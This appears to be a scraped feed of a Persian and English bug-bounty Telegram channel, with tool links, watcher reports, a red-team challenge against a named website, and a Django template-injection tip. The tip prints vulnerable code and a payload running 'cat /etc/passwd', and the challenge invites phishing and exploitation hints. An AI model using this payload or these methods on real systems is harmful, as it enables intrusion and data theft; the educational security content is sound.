A simple web app for parse _buildManifest.js file of NextJS web applications
https://sharokhataie.github.io/build-manifest-parser/
https://github.com/SharokhAtaie/build-manifest-parser
⭐️ @Zerosec_team
https://sharokhataie.github.io/build-manifest-parser/
https://github.com/SharokhAtaie/build-manifest-parser
⭐️ @Zerosec_team
❤4🙏1🤡1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤3
Sin0x001
من اونو به خودم تبدیل کردم ولی چون برگزیده قدرت زیادی داره باعث ایجاد یک باگ زنجیره ای شد
نه داداش میدونی آخه ایران درست میشه😐
🤣3😁1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤2
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥
🎯 هدف: نفوذ، شناسایی، استخراج
📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید.
⏳ مهلت: ۷ روز
🌐 لینک چالش: https://nexovir.ir
📢 جزئیات مأموریت: @zerosec_team
📤 ارسال نتایج: @zeroxdeadbee , @Securecon
ZeroTrace – Red Team Challenge (Level 1)
Objective: Infiltrate. Identify. Extract.
Mission Brief: Your task is to perform an initial access operation targeting the admin panel of the target website. For this proof of concept, you are required to extract the full list of usernames
Target: https://nexovir.ir
Time Limit: 7 days
Submit Results To: @zeroxdeadbee or @Securecon
#ZeroSec #Challenge #RedTeam #BugBounty #Hack #Pentest
⭐️ @Zerosec_team
🎯 هدف: نفوذ، شناسایی، استخراج
📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید.
⏳ مهلت: ۷ روز
🌐 لینک چالش: https://nexovir.ir
📢 جزئیات مأموریت: @zerosec_team
📤 ارسال نتایج: @zeroxdeadbee , @Securecon
ZeroTrace – Red Team Challenge (Level 1)
Objective: Infiltrate. Identify. Extract.
Mission Brief: Your task is to perform an initial access operation targeting the admin panel of the target website. For this proof of concept, you are required to extract the full list of usernames
Target: https://nexovir.ir
Time Limit: 7 days
Submit Results To: @zeroxdeadbee or @Securecon
#ZeroSec #Challenge #RedTeam #BugBounty #Hack #Pentest
⭐️ @Zerosec_team
🔥4❤2👨💻1😇1
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
سلام دوستان عزیزم،
برای حل این چالش لزومی ندارد صرفاً از یک فرایند خطی استفاده کنید. راههای مختلفی برای رسیدن به پاسخ وجود دارد و من تلاش کردهام برای همه دوستان با هر سطح مهارت، سرنخهایی قرار بدهم. هیچ محدودیتی در انتخاب روش وجود ندارد، پس سعی کنید با رویکردی واقعی و خلاقانه اقدام کنید.
Hello my friends,
You don’t need to follow a fixed step-by-step process to solve this challenge. There are many ways to do it, and I’ve shared hints for everyone at different skill levels. You can use any method you like, so try to approach it in a real and creative way.
برای حل این چالش لزومی ندارد صرفاً از یک فرایند خطی استفاده کنید. راههای مختلفی برای رسیدن به پاسخ وجود دارد و من تلاش کردهام برای همه دوستان با هر سطح مهارت، سرنخهایی قرار بدهم. هیچ محدودیتی در انتخاب روش وجود ندارد، پس سعی کنید با رویکردی واقعی و خلاقانه اقدام کنید.
Hello my friends,
You don’t need to follow a fixed step-by-step process to solve this challenge. There are many ways to do it, and I’ve shared hints for everyone at different skill levels. You can use any method you like, so try to approach it in a real and creative way.
❤5
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
شما میتونید از روش های پابلیک شده که در ادامه هست استفاده کنید هیچ محدودیتی درکار نخواهد بود :
You can use any of the publicly known methods listed below; there are no limitations on your approach.
Phishing (email phishing, malicious links, spear phishing)
Exploiting Public-Facing Applications (RCE, SQL Injection, LFI/RFI, API vulnerabilities)
Exploiting Services and Misconfigurations (SSH, RDP, SMB, VPN, credential leaks, default credentials)
Chaining Multiple Exploits (combining XSS and session hijacking, combining credential leaks and VPN access)
You can use any of the publicly known methods listed below; there are no limitations on your approach.
Phishing (email phishing, malicious links, spear phishing)
Exploiting Public-Facing Applications (RCE, SQL Injection, LFI/RFI, API vulnerabilities)
Exploiting Services and Misconfigurations (SSH, RDP, SMB, VPN, credential leaks, default credentials)
Chaining Multiple Exploits (combining XSS and session hijacking, combining credential leaks and VPN access)
👍3❤2
این دوست عماراتی تقریبا سرنخ خودش رو پیدا کرده و داره راه درستی رو میره امیدوارم بتونه آسیب پذیری رو اکسپلویت کنه و همچنین امیدوارم شما هم با متد خودتون راه نفوذ رو پیدا کنید✌️
⭐️ @Zerosec_team
⭐️ @Zerosec_team
❤4🔥1
🚨 Important Tip: RCE in Django via Unsafe Template Rendering
In Django, if user input is passed directly to a Template and rendered, it can lead to Remote Code Execution (RCE). This is a Server-Side Template Injection (SSTI) vulnerability.
💻 Vulnerable Example:
⚠️ In this code, user input is passed to the template without filtering, which can allow system command execution.
💥 Payload:
This payload:
Accesses the str class.
Uses mro and __subclasses__() to reach subprocess.Popen.
Executes a system command (cat /etc/passwd) and returns the output.
________________________________________________
🚨 نکته مهم : RCE در Django با Unsafe Template Rendering
در Django، اگر ورودی کاربر مستقیم به Template داده شود و رندر شود ممکن است منجر به RCE شود. این یک آسیب پذیری Server-Side Template Injection (SSTI) است.
💻 مثال آسیب پذیر:
⚠️ در این کد ورودی کاربر بدون فیلتر به Template داده میشود و میتواند باعث اجرای دستورات سیستم شود.
💥 Payload :
این Payload:
کلاس str رو میگیره.
از mro و __subclasses__() استفاده میکنه تا به subprocess.Popen دسترسی پیدا کنه.
دستور سیستم (cat /etc/passwd) رو اجرا میکنه و خروجی رو برمیگردونه.
#Django #RCE #SSTI #Hackers #BugBounty
⭐️ @Zerosec_team
In Django, if user input is passed directly to a Template and rendered, it can lead to Remote Code Execution (RCE). This is a Server-Side Template Injection (SSTI) vulnerability.
💻 Vulnerable Example:
from django.template import Template, Context
from django.http import HttpResponse
user_input = request.GET.get("name", "")
t = Template(user_input)
return HttpResponse(t.render(Context({})))
⚠️ In this code, user input is passed to the template without filtering, which can allow system command execution.
💥 Payload:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('cat /etc/passwd', shell=True).read() }}This payload:
Accesses the str class.
Uses mro and __subclasses__() to reach subprocess.Popen.
Executes a system command (cat /etc/passwd) and returns the output.
________________________________________________
🚨 نکته مهم : RCE در Django با Unsafe Template Rendering
در Django، اگر ورودی کاربر مستقیم به Template داده شود و رندر شود ممکن است منجر به RCE شود. این یک آسیب پذیری Server-Side Template Injection (SSTI) است.
💻 مثال آسیب پذیر:
from django.template import Template, Context
from django.http import HttpResponse
user_input = request.GET.get("name", "")
t = Template(user_input)
return HttpResponse(t.render(Context({})))
⚠️ در این کد ورودی کاربر بدون فیلتر به Template داده میشود و میتواند باعث اجرای دستورات سیستم شود.
💥 Payload :
{{ ''.__class__.__mro__[2].__subclasses__()[40]('cat /etc/passwd', shell=True).read() }}این Payload:
کلاس str رو میگیره.
از mro و __subclasses__() استفاده میکنه تا به subprocess.Popen دسترسی پیدا کنه.
دستور سیستم (cat /etc/passwd) رو اجرا میکنه و خروجی رو برمیگردونه.
#Django #RCE #SSTI #Hackers #BugBounty
⭐️ @Zerosec_team
❤4👌2🔥1🍾1
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
hint-0 :
XSS -> Email-Admin -> Phishing -> Exploite
this hint is for those who want to exploit a web vulnerability
❤4
📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 13 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 13 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔥4
DOMino.pdf
9.6 MB
#tools
#WebApp_Security
#Offensive_security
DEF CON 33:
"The DOMino Effect:
Automated Detection and Exploitation of DOM Clobbering Vulnerability at Scale".
]-> dynamic analysis tool to detect/exploit DOMC vulns
]-> Dataset: DOMC Gadgets Collection
]-> Research (.pdf)
// .. first dynamic analysis framework to automatically detect and exploit DOM Clobbering gadgets. Key insight is to model attacker-controlled HTML markups as Symbolic DOM - a formalized representation to define and solve DOM-related constraints with in the gadgets - so that it can be used to generate exploit HTML markups
⭐️ @Zerosec_team
#WebApp_Security
#Offensive_security
DEF CON 33:
"The DOMino Effect:
Automated Detection and Exploitation of DOM Clobbering Vulnerability at Scale".
]-> dynamic analysis tool to detect/exploit DOMC vulns
]-> Dataset: DOMC Gadgets Collection
]-> Research (.pdf)
// .. first dynamic analysis framework to automatically detect and exploit DOM Clobbering gadgets. Key insight is to model attacker-controlled HTML markups as Symbolic DOM - a formalized representation to define and solve DOM-related constraints with in the gadgets - so that it can be used to generate exploit HTML markups
⭐️ @Zerosec_team
👍6
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
سلام بچه ها یکی از دوستاتون موفق به حل چالش شد فقط دقت کردم که تو vmware لینکشو باز کردم😂 چون انتظار داشتم از exploit web برسه به دسترسی
کلا از نگرش و رویکردش خیلی خوشم اومد 👌
واقعا چالش سختی نیست این بیسیک ترین راه برای گرفتن initial access هست
⭐️ @Zerosec_team
کلا از نگرش و رویکردش خیلی خوشم اومد 👌
واقعا چالش سختی نیست این بیسیک ترین راه برای گرفتن initial access هست
⭐️ @Zerosec_team
❤5